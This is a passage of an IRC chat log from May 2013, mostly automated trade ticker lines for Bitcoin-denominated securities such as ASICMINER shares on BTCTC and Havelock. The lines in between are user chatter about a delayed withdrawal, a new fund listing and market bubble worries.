21:57:23 [BTCTC] [ASICMINER-PT] 1 @ 1.34 BTC [-] May 08 22:00:46 [BTCTC] [ASICMINER-PT] 1 @ 1.37 BTC [+] May 08 22:00:57 [MPEX] [O.USD.P320T] 1000 @ 1.87066819 = 1870.6682 BTC [-] May 08 22:03:55 wow 1.37 May 08 22:05:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.0132 = 1.32 BTC [+] May 08 22:05:35 [BTCTC] [ASICMINER-PT] 1 @ 1.34 BTC [-] May 08 22:06:12 [BTCTC] [ASICMINER-PT] 1 @ 1.37 BTC [+] May 08 22:06:14 [BTCTC] [COGNITIVE] 2 @ 0.25 = 0.5 BTC [+] May 08 22:06:16 [BTCTC] [ASICMINER-PT] 1 @ 1.330001 BTC [-] May 08 22:06:44 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [-] May 08 22:06:57 [BTCTC] [ASICMINER-PT] 1 @ 1.3111 BTC [-] May 08 22:06:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.013213 = 0.6607 BTC [+] May 08 22:09:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.01325 BTC [+] May 08 22:10:51 [BTCTC] [TAT.ASICMINER] 19 @ 0.01325 = 0.2518 BTC [+] May 08 22:11:58 [BTCTC] [TAT.ASICMINER] 73 @ 0.01325 = 0.9673 BTC [+] May 08 22:13:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.01325 = 0.0928 BTC [+] May 08 22:14:58 [BTCTC] [TAT.ASICMINER] 40 @ 0.013263 = 0.5305 BTC [+] May 08 22:15:33 [BTCTC] [TAT.ASICMINER] 50 @ 0.013213 = 0.6607 BTC [-] May 08 22:18:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.013263 BTC [+] May 08 22:19:25 [BTCTC] [ASICMINER-PT] 1 @ 1.311 BTC [-] May 08 22:21:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.013263 = 0.0398 BTC [+] May 08 22:21:56 TAT = Spam Asset May 08 22:22:06 [BTCTC] [ASICMINER-PT] 1 @ 1.31 BTC [-] May 08 22:22:11 looks worse when no one is chatting May 08 22:22:39 [BTCTC] [PAJKA.BOND] 3 @ 0.1075 = 0.3225 BTC [+] May 08 22:22:45 how was your day ? May 08 22:23:06 me? May 08 22:23:09 pretty good so far May 08 22:23:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.013263 = 0.0663 BTC [+] May 08 22:23:24 nice volume, and I have some good stuff brewing May 08 22:23:51 shut up May 08 22:23:57 im trying to watch the TAT trades May 08 22:24:50 I hope you didn't set a nickname alert on 'TAT' in your irc client, ThickAsThieves May 08 22:25:23 It would go off quite a bit :) May 08 22:25:59 i'm too obessive to need that May 08 22:26:11 i have a flash alert on this entire channel May 08 22:26:43 Yeah, me too. I like watching the stocks roll in May 08 22:26:45 [BTCTC] [ASICMINER-PT] 1 @ 1.305 BTC [-] May 08 22:27:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.013263 BTC [+] May 08 22:28:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.013285 = 0.0531 BTC [+] May 08 22:28:41 what is TAT ? May 08 22:28:48 Thick As Thieves May 08 22:28:48 TAT ass, homie! May 08 22:28:57 actually it's TATI May 08 22:29:04 Thick As Thieves Investments May 08 22:29:19 link ? doc ? May 08 22:30:38 i sold my ripple :greed: i got some fresh btc to throw in a other scam May 08 22:30:47 [BTCTC] [PAJKA.BOND] 1 @ 0.107999 BTC [+] May 08 22:31:00 link to what? May 08 22:31:06 the AM PT? May 08 22:31:16 https://btct.co/security/TAT.ASICMINER May 08 22:31:18 and May 08 22:31:23 https://bitfunder.com/asset/TAT.ASICMINER May 08 22:31:58 [BTCTC] [ASICMINER-PT] 1 @ 1.29602 BTC [-] May 08 22:32:18 thanks May 08 22:34:02 [HAVELOCK] [SDICE] 5 @ 0.3099 = 1.5495 BTC [+] May 08 22:34:08 np May 08 22:37:02 [BTCTC] [ASICMINER-PT] 1 @ 1.29601 BTC [-] May 08 22:39:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.013285 = 0.0399 BTC [+] May 08 22:41:34 [BTCTC] [ASICMINER-PT] 10 @ 1.296 = 12.96 BTC [-] May 08 22:44:20 are there any bets about asicminer bubble popping? May 08 22:44:46 "asicminer" 0 results found. May 08 22:46:34 [BTCTC] [ASICMINER-PT] 1 @ 1.275002 BTC [-] May 08 22:47:20 hrm May 08 22:47:55 is it normal for a btc withdrawal transaction from btct.co to not be found on blockchain.ingo? May 08 22:48:16 is it confirmed? May 08 22:48:44 what do you mean by confirmed May 08 22:49:42 give me either address and I will explain for you May 08 22:49:47 or I can use a dummy address May 08 22:50:05 https://blockchain.info/tx/37a6ec54f701e9fd91e240539581f32411a9be564d40ae4d685673e33454fb39 May 08 22:50:20 see the big red button that says "unconfirmed transaction!"? May 08 22:50:31 http://euobserver.com/justice/120064 << kakobrekla, high five May 08 22:50:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.013285 = 0.1196 BTC [+] May 08 22:50:53 Croatia, Slovenia, Greece and Slovakia most corrupt in EU May 08 22:50:54 [BTCTC] [ASICMINER-PT] 1 @ 1.271121 BTC [-] May 08 22:51:01 romania lags seriously May 08 22:51:21 sounds like you two are doing a corruption eiffel tower on the rest of hte EU. well done! May 08 22:51:43 i think we are just most honest May 08 22:52:00 then you aren't very corrupt May 08 22:52:22 we are open about corruption May 08 22:52:48 that's just 'getting things done'... corruption has a darker overtone for me. May 08 22:52:56 but i guess it's all the same thing May 08 22:53:02 deadweasel: yea i knew that, but the txid for my trasnaction is 'not found' on the site =/ May 08 22:53:16 just put in the receiving wallet address or the sending. May 08 22:53:19 follow those two May 08 22:53:39 if nothing shows up in either after a few hours, you should send a support email. May 08 22:53:41 inhies, try searching on https://blockexplorer.com/ too May 08 22:54:04 if the tx it isn't there either (and you didn't do a typo) then its' btct problem May 08 22:54:10 is blockexplorer back up? May 08 22:54:16 it was down the other week and i stopped caring May 08 22:54:20 [BTCTC] [S.DICE-PT] 11 @ 0.00308 = 0.0339 BTC [+] May 08 22:54:51 seems up... and has 235190 blocks as it should May 08 22:55:29 [BTCTC] [ASICMINER-PT] 1 @ 1.27112 BTC [-] May 08 22:55:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.013285 = 0.1329 BTC [+] May 08 22:55:49 deadweasel: will do, thanks May 08 22:55:56 my receiving address isnt showing anything yet May 08 22:55:58 blah May 08 22:56:02 all the other times it's been supar fast May 08 22:56:29 kakobrekla, my brother is doing energy optimizations for big industrial companies May 08 22:56:39 and laments often about corruption "how everything can work at all" May 08 22:59:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.013285 BTC [+] May 08 22:59:02 well, apparently it is possible..only roads are still full of potholes and public transport has to use 25 year old trams/buses... May 08 22:59:20 inhies, it's possible it just hasn't been picked for a block yet. I've had txns sit in 'pools' for 12 hours at worst, before seeing the first confirmation. May 08 22:59:23 but that is rare May 08 22:59:42 also remember that BTCT has a daily withdrawal limit May 08 22:59:55 and if you pass it, you must wait for Burnside to manually process it May 08 23:00:07 $unconfirmed May 08 23:00:07 the details are all on your wallet page May 08 23:00:09 dub: 1705 unconfirmed transactions. Oldest dated: 2013-05-06 10:36:00 May 08 23:00:12 [BTCTC] [ASICMINER-PT] 2 @ 1.2711 = 2.5422 BTC [-] May 08 23:01:37 deadweasel: ive had that happen too, but ive never had blockchain.info say it couldnt find a transaction at all May 08 23:01:44 unconfirmed is no big deal, but not found is May 08 23:01:59 ThickAsThieves: not anywhere near my limit, im poor! :) May 08 23:02:04 hehe May 08 23:03:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.013285 = 0.0399 BTC [+] May 08 23:03:19 https://bitcointalk.org/index.php?topic=93592.msg2077314#msg2077314 May 08 23:03:20 inhies, how long ago was it sent? May 08 23:05:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.013285 BTC [+] May 08 23:07:10 [BTCTC] [ASICMINER-PT] 1 @ 1.378999 BTC [+] May 08 23:09:46 what is 959,93? May 08 23:09:59 95k? May 08 23:10:06 1k May 08 23:10:19 anyway nvm i thought it was smth else May 08 23:11:51 [BTCTC] [ASICMINER-PT] 1 @ 1.388 BTC [+] May 08 23:12:41 [BTCTC] [ASICMINER-PT] 1 @ 1.3879 BTC [-] May 08 23:12:57 [BTCTC] [TAT.ASICMINER] 8 @ 0.013285 = 0.1063 BTC [+] May 08 23:15:48 [BTCTC] [ASICMINER-PT] 1 @ 1.3879 BTC [-] May 08 23:16:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.013285 BTC [+] May 08 23:17:00 deadweasel: looks like we're coming up on an hour.t he timestamp in the history page is 2013-05-08 20:35:42 May 08 23:17:46 i would send an email immediately, just because response times will vary, then ignore it for 5 hours, check again. May 08 23:18:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.013285 = 0.0664 BTC [+] May 08 23:19:01 looks like some people are having lag issues at BTCT too May 08 23:19:02 https://bitcointalk.org/index.php?topic=148350.msg2077503#msg2077503 May 08 23:20:45 [BTCTC] [ASICMINER-PT] 1 @ 1.387474 BTC [-] May 08 23:21:44 ;;bc,stats May 08 23:21:47 Current Blocks: 235195 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 676 blocks | Next Difficulty In About: 4 days, 2 hours, 19 minutes, and 38 seconds | Next Difficulty Estimate: 10833208.6997 | Estimated Percent Change: 7.51185 May 08 23:22:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.013285 = 0.0531 BTC [+] May 08 23:27:08 https://bitfunder.com/asset/CoinBr.iDiff-E price free fall... now at 0.19 May 08 23:33:01 hi all May 08 23:33:17 deadweasel: its shown up finally, all is well May 08 23:33:18 \o/ May 08 23:36:13 [BTCTC] [ASICMINER-PT] 1 @ 1.384999 BTC [-] May 08 23:36:25 [BTCTC] [ASICMINER-PT] 1 @ 1.385 BTC [+] May 08 23:37:08 [BTCTC] [ASICMINER-PT] 1 @ 1.38598 BTC [+] May 08 23:37:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.013285 BTC [+] May 08 23:37:49 [BTCTC] [ASICMINER-PT] 16 @ 1.385999 = 22.176 BTC [+] May 08 23:38:02 [BTCTC] [TAT.ASICMINER] 17 @ 0.013285 = 0.2258 BTC [+] May 08 23:38:26 [BTCTC] [ASICMINER-PT] 1 @ 1.387 BTC [+] May 08 23:39:27 [BTCTC] [ASICMINER-PT] 1 @ 1.3879 BTC [+] May 08 23:39:39 [BTCTC] [COGNITIVE] 12 @ 0.24 = 2.88 BTC [-] May 08 23:40:02 [BTCTC] [ASICMINER-PT] 9 @ 1.385999 = 12.474 BTC [-] May 08 23:40:39 [BTCTC] [COGNITIVE] 6 @ 0.238 = 1.428 BTC [-] May 08 23:41:03 [BTCTC] [COGNITIVE] 1 @ 0.22 BTC [-] May 08 23:41:25 [BTCTC] [COGNITIVE] 1 @ 0.2008 BTC [-] May 08 23:41:27 [BTCTC] [PAJKA.BOND] 7 @ 0.1069 = 0.7483 BTC [-] May 08 23:42:37 [BTCTC] [COGNITIVE] 10 @ 0.2 = 2 BTC [-] May 08 23:43:10 [BTCTC] [ASICMINER-PT] 1 @ 1.384999 BTC [-] May 08 23:43:55 [BTCTC] [PAJKA.BOND] 17 @ 0.1065 = 1.8105 BTC [-] May 08 23:44:04 !t b asicminer-pt May 08 23:44:04 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? May 08 23:44:20 !t btctc asicminer-pt May 08 23:44:22 [BTCT:ASICMINER-PT] 1D: 1.24 / 1.30768 / 1.3889 (486 shares, 635.5 BTC), 7D: 1.12 / 1.26995 / 1.3889 (1589 shares, 2017.9 BTC), 30D: 0.6269 / 1.09575 / 1.75 (7279 shares, 7975.9 BTC) May 08 23:45:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0131 BTC [-] May 08 23:46:28 [BTCTC] [COGNITIVE] 2 @ 0.1752 = 0.3504 BTC [-] May 08 23:46:41 [BTCTC] [PAJKA.BOND] 40 @ 0.1061 = 4.244 BTC [-] May 08 23:47:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0131 BTC [-] May 08 23:48:21 [BTCTC] [ASICMINER-PT] 4 @ 1.38599 = 5.544 BTC [+] May 08 23:49:02 [BTCTC] [PAJKA.BOND] 7 @ 0.106001 = 0.742 BTC [-] May 08 23:49:28 [BTCTC] [PAJKA.BOND] 5 @ 0.106001 = 0.53 BTC [-] May 08 23:50:42 [BTCTC] [ASICMINER-PT] 1 @ 1.385998 BTC [+] May 08 23:52:16 [BTCTC] [ASICMINER-PT] 1 @ 1.384 BTC [-] May 08 23:56:35 [MPEX] [O.USD.P320T] 1000 @ 1.85786104 = 1857.861 BTC [-] May 08 23:59:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.013 = 0.052 BTC [-] May 09 00:00:53 [BTCTC] [TAT.ASICMINER] 36 @ 0.013 = 0.468 BTC [-] May 09 00:05:02 [BTCTC] [TAT.ASICMINER] 100 @ 0.01309 = 1.309 BTC [+] May 09 00:06:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0131 = 0.0262 BTC [+] May 09 00:07:04 [BTCTC] [BASIC-MINING] 1 @ 0.4339 BTC [+] May 09 00:07:31 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [-] May 09 00:08:35 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [-] May 09 00:08:41 [BTCTC] [TAT.ASICMINER] 60 @ 0.0131 = 0.786 BTC [+] May 09 00:08:43 [BTCTC] [ASICMINER-PT] 4 @ 1.379 = 5.516 BTC [+] May 09 00:09:22 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19979 BTC [-] May 09 00:09:54 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [-] May 09 00:11:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.013285 = 0.5314 BTC [+] May 09 00:12:02 [HAVELOCK] [HIM] 1 @ 2.01 BTC [+] May 09 00:12:51 [BTCTC] [TAT.ASICMINER] 17 @ 0.01333 = 0.2266 BTC [+] May 09 00:15:02 [HAVELOCK] [ASICM] 10 @ 0.0129 = 0.129 BTC May 09 00:15:34 ^whoop May 09 00:16:15 [BTCTC] [ASICMINER-PT] 2 @ 1.35 = 2.7 BTC [-] May 09 00:17:54 The TAT Investments Empire has grown! May 09 00:18:00 what dat is? May 09 00:18:12 You can now get ASICMINER shares at https://www.havelockinvestments.com/fund.php?symbol=ASICM May 09 00:20:01 [HAVELOCK] [ASICM] 90 @ 0.0129 = 1.161 BTC May 09 00:21:03 [HAVELOCK] [ASICM] 100 @ 0.012925 = 1.2925 BTC [+] May 09 00:21:16 Official forum thread is here: https://bitcointalk.org/index.php?topic=199449.0 May 09 00:22:02 [HAVELOCK] [ASICM] 100 @ 0.01295 = 1.295 BTC [+] May 09 00:22:02 [HAVELOCK] [ASICM] 100 @ 0.012975 = 1.2975 BTC [+] May 09 00:22:04 [HAVELOCK] [ASICM] 50 @ 0.013 = 0.65 BTC [+] May 09 00:22:25 Nice May 09 00:23:01 [HAVELOCK] [ASICM] 30 @ 0.013 = 0.39 BTC [+] May 09 00:23:03 [HAVELOCK] [ASICM] 10 @ 0.013 = 0.13 BTC [+] May 09 00:24:14 [BTCTC] [TAT.ASICMINER] 12 @ 0.01333 = 0.16 BTC [+] May 09 00:25:27 [BTCTC] [ASICMINER-PT] 1 @ 1.331 BTC [-] May 09 00:25:48 [BTCTC] [TAT.ASICMINER] 41 @ 0.01333 = 0.5465 BTC [+] May 09 00:26:49 [BTCTC] [ASICMINER-PT] 1 @ 1.315 BTC [-] May 09 00:28:09 Just lookin at the stuff listed on other sites... I guess they didn't get the memo on PGP contracts. May 09 00:28:34 I really like those. :] May 09 00:28:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.01333 = 0.04 BTC [+] May 09 00:29:02 [HAVELOCK] [ASICM] 155 @ 0.013 = 2.015 BTC [+] May 09 00:30:02 [HAVELOCK] [ASICM] 5 @ 0.013 = 0.065 BTC [+] May 09 00:33:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.01333 BTC [+] May 09 00:34:01 [HAVELOCK] [ASICM] 250 @ 0.01305 = 3.2625 BTC [+] May 09 00:37:00 [BTCTC] [TAT.ASICMINER] 18 @ 0.01333 = 0.2399 BTC [+] May 09 00:37:02 [HAVELOCK] [ASICM] 9 @ 0.0131 = 0.1179 BTC [+] May 09 00:38:02 [HAVELOCK] [ASICM] 91 @ 0.0131 = 1.1921 BTC [+] May 09 00:38:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.01333 = 0.0533 BTC [+] May 09 00:39:02 [HAVELOCK] [ASICM] 91 @ 0.01315 = 1.1967 BTC [+] May 09 00:39:06 [BTCTC] [ASICMINER-PT] 1 @ 1.3748 BTC [+] May 09 00:40:02 [HAVELOCK] [ASICM] 9 @ 0.01315 = 0.1184 BTC [+] May 09 00:41:02 [HAVELOCK] [ASICM] 100 @ 0.0132 = 1.32 BTC [+] May 09 00:41:12 [BTCTC] [ASICMINER-PT] 2 @ 1.375 = 2.75 BTC [+] May 09 00:42:38 [BTCTC] [ASICMINER-PT] 5 @ 1.375 = 6.875 BTC [+] May 09 00:43:45 [BTCTC] [ASICMINER-PT] 1 @ 1.375 BTC [+] May 09 00:44:01 [HAVELOCK] [ASICM] 100 @ 0.0133 = 1.33 BTC [+] May 09 00:44:03 [HAVELOCK] [ASICM] 250 @ 0.01335 = 3.3375 BTC [+] May 09 00:44:04 [HAVELOCK] [ASICM] 50 @ 0.013375 = 0.6688 BTC [+] May 09 00:44:26 [BTCTC] [ASICMINER-PT] 1 @ 1.375 BTC [+] May 09 00:44:33 [BTCTC] [ASICMINER-PT] 1 @ 1.37795 BTC [+] May 09 00:45:28 [BTCTC] [ASICMINER-PT] 1 @ 1.36 BTC [-] May 09 00:47:02 [HAVELOCK] [ASICM] 200 @ 0.013375 = 2.675 BTC [+] May 09 00:48:02 [HAVELOCK] [ASICM] 100 @ 0.0134 = 1.34 BTC [+] May 09 00:48:03 [HAVELOCK] [ASICM] 100 @ 0.0134 = 1.34 BTC [+] May 09 00:48:04 [HAVELOCK] [ASICM] 50 @ 0.0134 = 0.67 BTC [+] May 09 00:48:05 [HAVELOCK] [ASICM] 250 @ 0.0134125 = 3.3531 BTC [+] May 09 00:48:06 [HAVELOCK] [ASICM] 200 @ 0.013425 = 2.685 BTC [+] May 09 00:48:50 [BTCTC] [TAT.ASICMINER] 200 @ 0.0131 = 2.62 BTC [-] May 09 00:49:02 [BTCTC] [ASICMINER-PT] 3 @ 1.377 = 4.131 BTC [+] May 09 00:49:03 [HAVELOCK] [ASICM] 25 @ 0.013425 = 0.3356 BTC [+] May 09 00:50:02 [HAVELOCK] [ASICM] 12 @ 0.013425 = 0.1611 BTC [+] May 09 00:51:02 [HAVELOCK] [VTX] 3 @ 0.4449 = 1.3347 BTC [-] May 09 00:51:18 [BTCTC] [ASICMINER-PT] 2 @ 1.377 = 2.754 BTC [+] May 09 00:52:02 [HAVELOCK] [ASICM] 13 @ 0.013425 = 0.1745 BTC [+] May 09 00:53:02 [HAVELOCK] [ASICM] 86 @ 0.01345 = 1.1567 BTC [+] May 09 00:53:12 havelock's got some volume today May 09 00:53:51 ASICM was just added half an hour ago May 09 00:53:54 to havelock May 09 00:54:02 !ticker h asicm May 09 00:54:03 [HAVELOCK:ASICM] 1D: 0.01290000 / 0.01322367 / 0.01345000 (2646 shares, 34.98982500 BTC), 7D: 0.01290000 / 0.01322367 / 0.01345000 (2646 shares, 34.98982500 BTC), 30D: 0.01290000 / 0.01322367 / 0.01345000 (2646 shares, 34.98982500 BTC) May 09 00:54:09 you are going to sell out soon at this rate May 09 00:54:11 that'd ASICplain things May 09 00:54:30 lol May 09 00:54:32 jborkl: yea tell ThickAsThieves to add more! he's running it :p May 09 00:54:36 shoot May 09 00:54:55 and thats without any sort of announcement going out to current havelock customers :p May 09 00:56:02 [HAVELOCK] [VTX] 5 @ 0.4449 = 2.2245 BTC [-] May 09 00:56:08 I have more to sell no worried May 09 00:56:11 worries* May 09 00:56:15 at least for now... May 09 00:56:43 I have a decent amount, but I dont want to sell yet May 09 00:58:02 [HAVELOCK] [ASICM] 164 @ 0.01345 = 2.2058 BTC [+] May 09 00:59:07 [BTCTC] [BTC-BOND] 1 @ 0.010069 BTC [+] May 09 01:02:01 [HAVELOCK] [VTX] 2 @ 0.4449 = 0.8898 BTC [-] May 09 01:03:02 [HAVELOCK] [ASICM] 49 @ 0.013475 = 0.6603 BTC [+] May 09 01:06:57 [MPEX] [S.MPOE] 10912 @ 0.000725 = 7.9112 BTC [+] May 09 01:08:01 [HAVELOCK] [ASICM] 19 @ 0.013455 = 0.2556 BTC [-] May 09 01:09:02 [HAVELOCK] [ASICM] 100 @ 0.01345 = 1.345 BTC [-] May 09 01:14:02 [HAVELOCK] [ASICM] 201 @ 0.013475 = 2.7085 BTC [+] May 09 01:14:03 [HAVELOCK] [ASICM] 250 @ 0.01348 = 3.37 BTC [+] May 09 01:14:05 [HAVELOCK] [ASICM] 250 @ 0.0135 = 3.375 BTC [+] May 09 01:14:06 [HAVELOCK] [ASICM] 250 @ 0.013525 = 3.3813 BTC [+] May 09 01:16:03 [HAVELOCK] [ASICM] 250 @ 0.013555 = 3.3888 BTC [+] May 09 01:16:03 [HAVELOCK] [ASICM] 49 @ 0.013555 = 0.6642 BTC [+] May 09 01:23:01 [HAVELOCK] [ASICM] 100 @ 0.013575 = 1.3575 BTC [+] May 09 01:24:01 [HAVELOCK] [VTX] 3 @ 0.4449 = 1.3347 BTC [-] May 09 01:25:02 [HAVELOCK] [ASICM] 30 @ 0.0136 = 0.408 BTC [+] May 09 01:28:01 [HAVELOCK] [ASICM] 50 @ 0.0136 = 0.68 BTC [+] May 09 01:28:33 [MPEX] [O.USD.P320T] 400 @ 1.84112938 = 736.4518 BTC [-] May 09 01:30:02 [HAVELOCK] [ASICM] 7 @ 0.0136 = 0.0952 BTC [+] May 09 01:31:26 [BTCTC] [ASICMINER-PT] 1 @ 1.3768 BTC [-] May 09 01:35:03 [HAVELOCK] [ASICM] 13 @ 0.0136 = 0.1768 BTC [+] May 09 01:35:04 [HAVELOCK] [ASICM] 100 @ 0.01365 = 1.365 BTC [+] May 09 01:35:05 [HAVELOCK] [ASICM] 87 @ 0.0137 = 1.1919 BTC [+] May 09 01:36:02 [HAVELOCK] [ASICM] 13 @ 0.0137 = 0.1781 BTC [+] May 09 01:38:03 [HAVELOCK] [ASICM] 35 @ 0.01375 = 0.4813 BTC [+] May 09 01:38:32 quiet in here May 09 01:38:39 [BTCTC] [ASICMINER-PT] 3 @ 1.377 = 4.131 BTC [+] May 09 01:38:43 busy, but here May 09 01:39:01 [HAVELOCK] [ASICM] 1 @ 0.0137 BTC [-] May 09 01:39:03 [HAVELOCK] [ASICM] 100 @ 0.01375 = 1.375 BTC [+] May 09 01:39:35 everyone's watching :D May 09 01:41:02 [HAVELOCK] [ASICM] 10 @ 0.013825 = 0.1383 BTC [+] May 09 01:41:03 [HAVELOCK] [ASICM] 40 @ 0.013825 = 0.553 BTC [+] May 09 01:41:53 can't shake the feeling that AM is going to be the next pirate level event May 09 01:42:02 [HAVELOCK] [ASICM] 90 @ 0.0139 = 1.251 BTC [+] May 09 01:42:03 [HAVELOCK] [ASICM] 9 @ 0.0139 = 0.1251 BTC [+] May 09 01:42:05 [HAVELOCK] [ASICM] 1 @ 0.0139 BTC [+] May 09 01:42:30 i sure hope not May 09 01:42:32 hehe May 09 01:44:02 [HAVELOCK] [ASICM] 50 @ 0.013975 = 0.6988 BTC [+] May 09 01:44:04 [HAVELOCK] [ASICM] 52 @ 0.014 = 0.728 BTC [+] May 09 01:44:28 dub: that would be hilarious wouldnt it May 09 01:45:02 [HAVELOCK] [HIM] 1 @ 2 BTC [-] May 09 01:46:03 [HAVELOCK] [ASICM] 142 @ 0.014 = 1.988 BTC [+] May 09 01:47:17 [BTCTC] [ASICMINER-PT] 2 @ 1.377 = 2.754 BTC [+] May 09 01:48:21 [BTCTC] [ASICMINER-PT] 1 @ 1.37797 BTC [+] May 09 01:48:43 [BTCTC] [ASICMINER-PT] 10 @ 1.378 = 13.78 BTC [+] May 09 01:49:12 [BTCTC] [ASICMINER-PT] 5 @ 1.3877 = 6.9385 BTC [+] May 09 01:50:07 [BTCTC] [ASICMINER-PT] 5 @ 1.387979 = 6.9399 BTC [+] May 09 01:50:29 [BTCTC] [ASICMINER-PT] 1 @ 1.38798 BTC [+] May 09 01:51:30 [BTCTC] [ASICMINER-PT] 1 @ 1.387979 BTC [-] May 09 01:52:02 [HAVELOCK] [ASICM] 56 @ 0.014 = 0.784 BTC [+] May 09 01:52:04 [BTCTC] [ASICMINER-PT] 4 @ 1.388 = 5.552 BTC [+] May 09 01:52:30 dub possibly. not quite the size tho May 09 01:52:51 [BTCTC] [BASIC-MINING] 1 @ 0.42 BTC [-] May 09 01:52:55 [BTCTC] [S.DICE-PT] 132 @ 0.00308 = 0.4066 BTC [+] May 09 01:52:56 [BTCTC] [ASICMINER-PT] 26 @ 1.388 = 36.088 BTC [+] May 09 01:53:18 [BTCTC] [ASICMINER-PT] 1 @ 1.388 BTC [+] May 09 01:54:02 [HAVELOCK] [ASICM] 24 @ 0.014 = 0.336 BTC [+] May 09 01:54:43 [BTCTC] [BITVPS] 1 @ 0.00114 BTC [+] May 09 01:54:56 [BTCTC] [BITVPS] 99 @ 0.00115 = 0.1139 BTC [+] May 09 01:55:02 [HAVELOCK] [ASICM] 399 @ 0.01375 = 5.4863 BTC [-] May 09 01:55:06 mircea_popescu: no but possibly bigger impact given bitcoin is no longer a toy for nerds May 09 01:55:22 maybe. tbh i think lower impact exactly for that reason May 09 01:55:39 (you won't get anyone but nerds in the sort of groupthink traps that this sort of stuff is dangertous for) May 09 01:55:49 [BTCTC] [BITVPS] 100 @ 0.00119 = 0.119 BTC [+] May 09 01:56:03 [BTCTC] [BITVPS] 120 @ 0.0013 = 0.156 BTC [+] May 09 01:56:05 [BTCTC] [ASICMINER-PT] 2 @ 1.355 = 2.71 BTC [-] May 09 01:56:28 well... nerds and weird religious groups May 09 01:57:00 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [-] May 09 01:57:11 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [-] May 09 01:57:47 [BTCTC] [BITVPS] 21 @ 0.0013 = 0.0273 BTC [+] May 09 01:58:26 [BTCTC] [S.DICE-PT] 74 @ 0.00309 = 0.2287 BTC [+] May 09 01:59:20 [BTCTC] [S.DICE-PT] 70 @ 0.00314 = 0.2198 BTC [+] May 09 02:00:57 [BTCTC] [ASICMINER-PT] 2 @ 1.38 = 2.76 BTC [+] May 09 02:01:57 [BTCTC] [TAT.ASICMINER] 40 @ 0.013339 = 0.5336 BTC [+] May 09 02:02:02 [HAVELOCK] [ASICM] 300 @ 0.01352 = 4.056 BTC [-] May 09 02:04:06 [BTCTC] [ASICMINER-PT] 1 @ 1.38 BTC [+] May 09 02:05:38 [BTCTC] [B.YABMC] 20 @ 0.0194 = 0.388 BTC [+] May 09 02:05:40 [BTCTC] [ASICMINER-PT] 2 @ 1.384 = 2.768 BTC [+] May 09 02:13:08 [BTCTC] [ASICMINER-PT] 3 @ 1.38 = 4.14 BTC [-] May 09 02:14:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.013339 = 0.0267 BTC [+] May 09 02:17:03 [HAVELOCK] [ASICM] 100 @ 0.014 = 1.4 BTC [+] May 09 02:18:34 [BTCTC] [ASICMINER-PT] 1 @ 1.38 BTC [-] May 09 02:18:46 [BTCTC] [ASICMINER-PT] 10 @ 1.385 = 13.85 BTC [+] May 09 02:18:51 [BTCTC] [ASICMINER-PT] 7 @ 1.388 = 9.716 BTC [+] May 09 02:18:56 [BTCTC] [ASICMINER-PT] 10 @ 1.389 = 13.89 BTC [+] May 09 02:19:04 [BTCTC] [ASICMINER-PT] 1 @ 1.37999 BTC [-] May 09 02:19:18 [BTCTC] [ASICMINER-PT] 1 @ 1.39 BTC [+] May 09 02:19:23 [BTCTC] [ASICMINER-PT] 20 @ 1.39 = 27.8 BTC [+] May 09 02:20:25 [BTCTC] [ASICMINER-PT] 20 @ 1.3925 = 27.85 BTC [+] May 09 02:21:13 [BTCTC] [TAT.ASICMINER] 80 @ 0.013339 = 1.0671 BTC [+] May 09 02:21:46 [BTCTC] [TAT.ASICMINER] 75 @ 0.01345 = 1.0088 BTC [+] May 09 02:22:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.0135 = 0.675 BTC [+] May 09 02:25:32 [BTCTC] [ASICMINER-PT] 1 @ 1.39888 BTC [+] May 09 02:28:52 [MPEX] [S.MPOE] 11681 @ 0.000725 = 8.4687 BTC [+] May 09 02:30:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.01365 = 0.6825 BTC [+] May 09 02:30:52 [BTCTC] [ASICMINER-PT] 1 @ 1.39899 BTC [+] May 09 02:31:11 [BTCTC] [ASICMINER-PT] 2 @ 1.39899 = 2.798 BTC [+] May 09 02:31:13 [BTCTC] [TAT.ASICMINER] 100 @ 0.0137 = 1.37 BTC [+] May 09 02:33:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.01375 = 0.275 BTC [+] May 09 02:33:33 [BTCTC] [TAT.ASICMINER] 80 @ 0.01375 = 1.1 BTC [+] May 09 02:33:43 [BTCTC] [ASICMINER-PT] 5 @ 1.399 = 6.995 BTC [+] May 09 02:34:41 [BTCTC] [TAT.ASICMINER] 100 @ 0.013899 = 1.3899 BTC [+] May 09 02:34:53 [BTCTC] [ASICMINER-PT] 1 @ 1.399 BTC [+] May 09 02:35:05 I'm kinda surprised that shares 